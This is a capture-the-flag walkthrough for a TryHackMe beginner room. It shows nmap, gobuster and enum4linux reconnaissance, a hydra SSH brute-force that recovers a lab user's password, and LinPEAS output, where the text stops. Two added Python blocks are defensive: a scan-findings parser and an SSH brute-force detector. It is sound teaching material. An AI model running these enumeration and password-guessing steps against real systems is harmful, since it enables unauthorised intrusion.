TryHackMe - Basic Pentesting
# Room info
- Name: Basic Pentesting
- Link: https://tryhackme.com/room/basicpentestingjt
- Subscription: Free
- Difficulty: Easy
- Description: This is a machine that allows you to practise web app hacking and privilege escalation
# Questions
- Deploy the machine and connect to our network
- Find the services exposed by the machine
- What is the name of the hidden directory on the web server(enter name without /)?
- User brute-forcing to find the username & password
- What is the username?
- What is the password?
- What service do you use to access the server(answer in abbreviation in all caps)?
- Enumerate the machine to find any vectors for privilege escalation
- What is the name of the other user you found(all lower case)?
- If you have found another user, what can you do with this information?
- What is the final password you obtain?
# Question 1 - Deploy the machine and connect to our network
No answer needed.
# Question 2 - Find the services exposed by the machine
No answer needed, but we can use nmap to find the services exposed by the machine; the results are useful for the next questions.
$ nmap -sC -sV 10.10.131.121
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 14:46 CEST
Nmap scan report for 10.10.131.121 (10.10.131.121)
Host is up (0.080s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
|_http-favicon: Apache Tomcat
| fingerprint-strings:
| DNSStatusRequestTCP, Help:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sun, 30 Apr 2023 12:47:41 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=4/30%Time=644E636E%P=x86_64-pc-linux-gnu%r(DN
SF:SStatusRequestTCP,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ht
SF:ml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\
SF:r\nDate:\x20Sun,\x2030\x20Apr\x202023\x2012:47:41\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20
SF:type=\"text/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:whit
SF:e;background-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahom
SF:a,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;
SF:}\x20h3\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
SF:color:#525D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,san
SF:s-serif;color:black;background-color:white;}\x20b\x20{font-family:Tahom
SF:a,Arial,sans-serif;color:white;background-color:#525D76;}\x20p\x20{font
SF:-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:
SF:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x2
SF:0{height:1px;background-color:#525D76;border:none;}</style></head><bod"
SF:)%r(Help,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sun,\x2030\x20Apr\x202023\x2012:47:41\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2023-04-30T08:47:47-04:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-30T12:47:47
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.01 seconds
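The scan above is only useful once someone reads it, so here is a small parser that turns a saved `nmap -sC -sV` run into a service inventory plus the findings a reviewer would pull out of it (SMB signing not required, guest/null session accepted, AJP and a second HTTP service exposed). This is an added example, not code from the original write-up; the scan text inside it is a constructed excerpt modelled on the output above, and the recommendations are generic hardening advice rather than anything the room states.

```python
"""Turn a saved `nmap -sC -sV` run into a short attack-surface review.
Added example (not part of the original write-up); the scan text below is a
constructed excerpt modelled on the output above, and the recommendations
are generic hardening advice, not findings the room states."""
import re
from dataclasses import dataclass, field

# Constructed sample: trimmed from the kind of output nmap prints above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
8080/tcp open http-proxy
|_http-title: Apache Tomcat/9.0.7
Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# "PORT/PROTO STATE SERVICE [VERSION...]" rows of the port table.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


@dataclass
class Review:
    services: list = field(default_factory=list)
    findings: list = field(default_factory=list)


def parse_scan(text: str) -> Review:
    """Collect open services and flag the SMB/Tomcat issues visible in NSE output."""
    review = Review()
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            review.services.append(Service(int(port), proto, state, name, version.strip()))
            continue
        if line.startswith("|"):
            # NSE script lines are prefixed with "| " or "|_"; drop the prefix.
            body = line.lstrip("|_ ").strip()
            if body.startswith("message_signing:") and "disabled" in body:
                review.findings.append("SMB1 message signing disabled: require signing or disable SMB1")
            elif body == "Message signing enabled but not required":
                review.findings.append("SMB2 signing not required: set 'server signing = mandatory' in smb.conf")
            elif body.startswith("account_used: guest"):
                review.findings.append("SMB answered a guest/null session: restrict anonymous access")
    open_ports = {s.port for s in review.services if s.state == "open"}
    if 8009 in open_ports:
        review.findings.append("AJP connector (8009) reachable from the network: bind it to 127.0.0.1 or disable it")
    if {80, 8080} <= open_ports:
        review.findings.append("Two HTTP services exposed (80 and 8080): confirm both are meant to be public")
    return review


def summarize(review: Review) -> str:
    """One line per service, then the findings prefixed with [!]."""
    lines = [f"{s.port}/{s.proto} {s.name} {s.version}".rstrip() for s in review.services]
    lines += [f"[!] {f}" for f in review.findings]
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(parse_scan(SAMPLE_SCAN)))
```

Feed it the normal (`-oN`) output of a real scan and the same five findings come out for this host; for anything larger, parse `-oX` with an XML library instead of regexes over the text table.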
# Question 3 - What is the name of the hidden directory on the web server(enter name without /)?
Use gobuster with a wordlist to find the hidden directory:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 10.10.131.121 -q
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/development (Status: 301) [Size: 320] [--> http://10.10.131.121/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 301]
So the answer is development.
# Question 4 - User brute-forcing to find the username & password
No answer needed, but there are two files in the hidden directory. The first is dev.txt:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
and the second is j.txt:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
SMB is configured, so we can use enum4linux to enumerate usernames over it:
$ enum4linux -a 10.10.131.121
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 30 14:57:31 2023
=========================================( Target Information )=========================================
Target ........... 10.10.131.121
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.131.121 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 10.10.131.121 )===============================
Looking up status of 10.10.131.121
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.131.121 )===================================
[+] Server 10.10.131.121 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.131.121 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.131.121 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.131.121 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.131.121 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.131.121 )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 10.10.131.121
//10.10.131.121/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.131.121/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.131.121 )===========================
[+] Attaching to 10.10.131.121 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.131.121 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.131.121 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
===============================( Getting printer info for 10.10.131.121 )===============================
No printers returned.
Nice, two users: kay and jan. From j.txt we know that jan has a weak password, so we can use hydra to brute-force it over SSH.
$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.131.121 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-30 15:03:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.131.121:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[STATUS] 109.00 tries/min, 327 tries in 00:03h, 14344075 to do in 2193:18h, 13 active
[STATUS] 95.14 tries/min, 666 tries in 00:07h, 14343736 to do in 2512:40h, 13 active
[22][ssh] host: 10.10.131.121 login: jan password: armando
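The hydra run above produces hundreds of failed logins per minute on the target, which is exactly what a host-side detection should catch. The following is an added example (not part of the original write-up) of the detection logic a defender would run over sshd records in auth.log: a sliding window of failures per source address, and a separate, higher-severity alert when a password login from that source succeeds after the burst. The log lines are constructed, and the threshold and window are assumed values to tune per environment.

```python
"""Flag SSH password brute-forcing in auth.log-style sshd records, as a
defender would on the host side of the hydra run above.  Added example, not
part of the original write-up; the log lines are constructed and the
threshold/window values are assumptions to tune per environment."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d)"
FAIL_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
OK_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+")


def parse_ts(text: str, year: int) -> datetime:
    # syslog timestamps carry no year; the caller supplies it.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def build_sample_log() -> list:
    """Constructed records: a burst of failures, a password success from the
    same source, and ordinary activity from another host."""
    lines = [
        f"Apr 30 15:03:{30 + i:02d} basic2 sshd[{2400 + i}]: Failed password for jan "
        f"from 10.8.32.129 port {34910 + i} ssh2"
        for i in range(12)
    ]
    lines.append("Apr 30 15:03:45 basic2 sshd[2420]: Accepted password for jan from 10.8.32.129 port 34930 ssh2")
    lines.append("Apr 30 15:04:10 basic2 sshd[2430]: Failed password for kay from 10.8.40.7 port 50010 ssh2")
    lines.append("Apr 30 15:09:00 basic2 sshd[2440]: Accepted publickey for kay from 10.8.40.7 port 50020 ssh2")
    return lines


def detect(lines, threshold=10, window=timedelta(seconds=60), year=2023):
    """Return (kind, source_ip, detail) alerts.  A source is flagged once when
    `threshold` failures land inside `window`; a later password login from a
    flagged source is raised separately, since that is the case that matters."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ts = parse_ts(m["ts"], year)
            q = recent[m["ip"]]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append(("brute_force", m["ip"],
                               f"{len(q)} failed logins within {int(window.total_seconds())}s"))
            continue
        m = OK_RE.match(line)
        if m and m["method"] == "password" and m["ip"] in flagged:
            alerts.append(("success_after_brute_force", m["ip"],
                           f"password login as {m['user']} after failure burst"))
    return alerts


if __name__ == "__main__":
    for kind, ip, detail in detect(build_sample_log()):
        print(f"{kind:26} {ip:15} {detail}")
```

The sliding window matters: hydra's 100-150 tries per minute in the output above would trip a 10-in-60s rule within seconds, while a single mistyped password from another host does not. Publickey logins are deliberately not counted as "success after brute force", because a key login cannot be the result of password guessing.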
# Question 5 - What is the username?
The answer is jan.
# Question 6 - What is the password?
The answer is armando.
# Question 7 - What service do you use to access the server(answer in abbreviation in all caps)?
The answer is SSH.
# Question 8 - Enumerate the machine to find any vectors for privilege escalation
No answer needed, but we can use LinPEAS to enumerate the machine.
jan@basic2:/tmp$ ./linpeas.sh
linpeas v2.2.7 by carlospolop
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEYEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangenta: Your username
====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (You can use linpeas to discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (You can use linpeas to discover hosts/port scanning, learn more with -h)
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16
[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[+] Date
Sun Apr 30 09:15:46 EDT 2023
[+] System stats
Filesystem Size Used Avail Use% Mounted on
udev 224M 0 224M 0% /dev
tmpfs 49M 3.3M 46M 7% /run
/dev/xvda1 14G 2.4G 11G 19% /
tmpfs 244M 0 244M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 244M 0 244M 0% /sys/fs/cgroup
tmpfs 49M 0 49M 0% /run/user/1001
total used free shared buff/cache available
Mem: 498068 246808 31916 3152 219344 216392
Swap: 1045500 1312 1044188
[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.8.32.129 34902 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=4
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.8.32.129 34902 10.10.131.121 22
HISTFILE=/dev/null
[+] Looking for Signature verification failed in dmseg
Not Found
[+] selinux enabled? .......... sestatus Not Found
[+] Printer? .......... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .......... Yes
=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)
[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf / ext4 errors=remount-ro 0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a none swap sw 0 0
====================================( Available Software )====================================
[+] Useful software?
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo
[+] Installed compilers?
/usr/share/gcc-5
================================( Processes, Cron & Services )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.9 1.1 37828 5804 ? Ss 08:40 0:20 /sbin/init
root 359 0.0 0.5 27704 2960 ? Ss 08:40 0:00 /lib/systemd/systemd-journald
root 396 0.0 0.3 94772 1580 ? Ss 08:41 0:00 /sbin/lvmetad -f
root 416 0.1 0.7 44696 3812 ? Ss 08:41 0:02 /lib/systemd/systemd-udevd
systemd+ 498 0.0 0.4 100324 2384 ? Ssl 08:41 0:00 /lib/systemd/systemd-timesyncd
root 818 0.0 0.3 160904 1576 ? Ssl 08:41 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 821 0.0 0.5 29008 2720 ? Ss 08:41 0:00 /usr/sbin/cron -f
message+ 824 0.0 0.7 42900 3544 ? Ss 08:41 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 833 0.0 0.2 4396 1288 ? Ss 08:41 0:00 /usr/sbin/acpid
daemon 836 0.0 0.4 26044 2088 ? Ss 08:41 0:00 /usr/sbin/atd -f
syslog 841 0.0 0.6 256392 3168 ? Ssl 08:41 0:00 /usr/sbin/rsyslogd -n
root 856 0.0 0.6 28620 3064 ? Ss 08:41 0:00 /lib/systemd/systemd-logind
root 859 0.0 1.2 275896 6144 ? Ssl 08:41 0:00 /usr/lib/accountsservice/accounts-daemon
root 864 0.0 3.1 211344 15680 ? Ssl 08:41 0:00 /usr/lib/snapd/snapd
root 880 0.0 1.1 277176 5732 ? Ssl 08:41 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 881 0.0 0.0 13372 144 ? Ss 08:41 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 898 0.0 2.9 337920 14888 ? Ss 08:41 0:00 /usr/sbin/smbd -D
root 904 0.0 1.1 329804 5620 ? S 08:41 0:00 /usr/sbin/smbd -D
root 929 0.0 0.5 16124 2544 ? Ss 08:41 0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 933 0.0 1.2 337920 6336 ? S 08:41 0:00 /usr/sbin/smbd -D
root 990 0.0 1.1 65508 5696 ? Ss 08:41 0:00 /usr/sbin/sshd -D
tomcat9 1007 7.0 39.7 2548928 197980 ? Sl 08:41 2:24 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
root 1023 0.0 0.0 5220 152 ? Ss 08:41 0:00 /sbin/iscsid
root 1024 0.0 0.7 5720 3516 ? S<Ls 08:41 0:00 /sbin/iscsid
root 1132 0.0 0.3 15936 1580 tty1 Ss+ 08:41 0:00 /sbin/agetty --noclear tty1 linux
root 1136 0.0 0.4 15752 2032 ttyS0 Ss+ 08:41 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root 1168 0.0 0.8 71584 4156 ? Ss 08:41 0:00 /usr/sbin/apache2 -k start
www-data 1170 0.0 0.8 689100 4460 ? Sl 08:41 0:00 /usr/sbin/apache2 -k start
www-data 1171 0.0 0.9 558068 4556 ? Sl 08:41 0:00 /usr/sbin/apache2 -k start
root 1232 0.0 1.1 240008 5840 ? Ss 08:41 0:00 /usr/sbin/nmbd -D
jan 2361 0.0 0.9 45276 4568 ? Ss 09:15 0:00 /lib/systemd/systemd --user
jan 2362 0.0 0.3 61280 1972 ? S 09:15 0:00 (sd-pam)
jan 2396 0.0 0.6 92832 3360 ? S 09:15 0:00 sshd: jan@pts/0
jan 2397 0.0 1.0 22572 5260 pts/0 Ss 09:15 0:00 -bash
jan 2408 0.0 0.3 4504 1844 pts/0 S+ 09:15 0:00 /bin/sh ./linpeas.sh
jan 2593 0.0 0.6 37364 3288 pts/0 R+ 09:15 0:00 ps aux
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
0 lrwxrwxrwx 1 root root 4 Apr 17 2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar 8 2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar 8 2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar 8 2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar 8 2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar 8 2018 /lib/systemd/systemd-udevd
44K -rwxr-xr-x 1 root root 44K Nov 30 2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar 5 2018 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26 2017 /sbin/iscsid
52K -rwxr-xr-x 1 root root 51K Apr 16 2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov 8 2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12 2017 /usr/bin/dbus-daemon
20K -rwxr-xr-x 1 root root 19K Nov 8 2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
0 lrwxrwxrwx 1 root root 15 Mar 14 2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
16K -rwxr-xr-x 1 root root 15K Jan 17 2016 /usr/lib/policykit-1/polkitd
21M -rwxr-xr-x 1 root root 21M Nov 30 2017 /usr/lib/snapd/snapd
